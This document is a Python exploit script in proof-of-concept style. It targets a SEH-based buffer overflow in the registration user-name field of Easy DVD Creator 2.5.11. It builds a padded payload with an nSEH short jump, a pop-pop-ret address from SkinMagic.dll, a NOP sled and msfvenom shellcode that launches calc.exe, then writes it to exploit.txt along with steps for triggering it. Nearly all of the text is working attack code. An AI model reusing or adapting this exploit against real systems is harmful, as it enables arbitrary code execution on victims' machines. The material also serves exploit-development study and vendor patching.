|
#!/usr/bin/env python
# Exploit Title : Easy DVD Creator 2.5.11 - Buffer Overflow in 'Registration UserName Field' (SEH)
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]
# Email : spiritedwolf@protonmail.com
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit
# Discovey Date : 29/07/2018
# Software Link : http://www.divxtodvd.net/dvd-creator.htm
# Tested Version : 2.5.11
# Tested on OS : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".
# Just copy the text inside "exploit.txt" and start the Easy DVD Creator 2.5.11 program and click on "Register".
# In the third field i.e "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator poped up.
# Greetz : @FuzzySec @LiveOverflow @hexachordanu
buffer = "\x41" * 996
#Short Jump address
nseh = "\xeb\x06\x90\x90"
#0x10037859 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False,
# v1.8.1.1 (C:\Program Files\Easy DVD Creator\SkinMagic.dll)
seh= "\x59\x78\x03\x10"
#badchar \x00\x0a\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d' -f python
buf = ""
buf += "\xbf\x4d\xb3\x6b\x1e\xda\xda\xd9\x74\x24\xf4\x58\x33"
buf += "\xc9\xb1\x31\x31\x78\x13\x83\xe8\xfc\x03\x78\x42\x51"
buf += "\x9e\xe2\xb4\x17\x61\x1b\x44\x78\xeb\xfe\x75\xb8\x8f"
buf += "\x8b\x25\x08\xdb\xde\xc9\xe3\x89\xca\x5a\x81\x05\xfc"
buf += "\xeb\x2c\x70\x33\xec\x1d\x40\x52\x6e\x5c\x95\xb4\x4f"
buf += "\xaf\xe8\xb5\x88\xd2\x01\xe7\x41\x98\xb4\x18\xe6\xd4"
buf += "\x04\x92\xb4\xf9\x0c\x47\x0c\xfb\x3d\xd6\x07\xa2\x9d"
buf += "\xd8\xc4\xde\x97\xc2\x09\xda\x6e\x78\xf9\x90\x70\xa8"
buf += "\x30\x58\xde\x95\xfd\xab\x1e\xd1\x39\x54\x55\x2b\x3a"
buf += "\xe9\x6e\xe8\x41\x35\xfa\xeb\xe1\xbe\x5c\xd0\x10\x12"
buf += "\x3a\x93\x1e\xdf\x48\xfb\x02\xde\x9d\x77\x3e\x6b\x20"
buf += "\x58\xb7\x2f\x07\x7c\x9c\xf4\x26\x25\x78\x5a\x56\x35"
buf += "\x23\x03\xf2\x3d\xc9\x50\x8f\x1f\x87\xa7\x1d\x1a\xe5"
buf += "\xa8\x1d\x25\x59\xc1\x2c\xae\x36\x96\xb0\x65\x73\x68"
buf += "\xfb\x24\xd5\xe1\xa2\xbc\x64\x6c\x55\x6b\xaa\x89\xd6"
buf += "\x9e\x52\x6e\xc6\xea\x57\x2a\x40\x06\x25\x23\x25\x28"
buf += "\x9a\x44\x6c\x4b\x7d\xd7\xec\xa2\x18\x5f\x96\xba"
nops = "\x90" * 16
exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()
|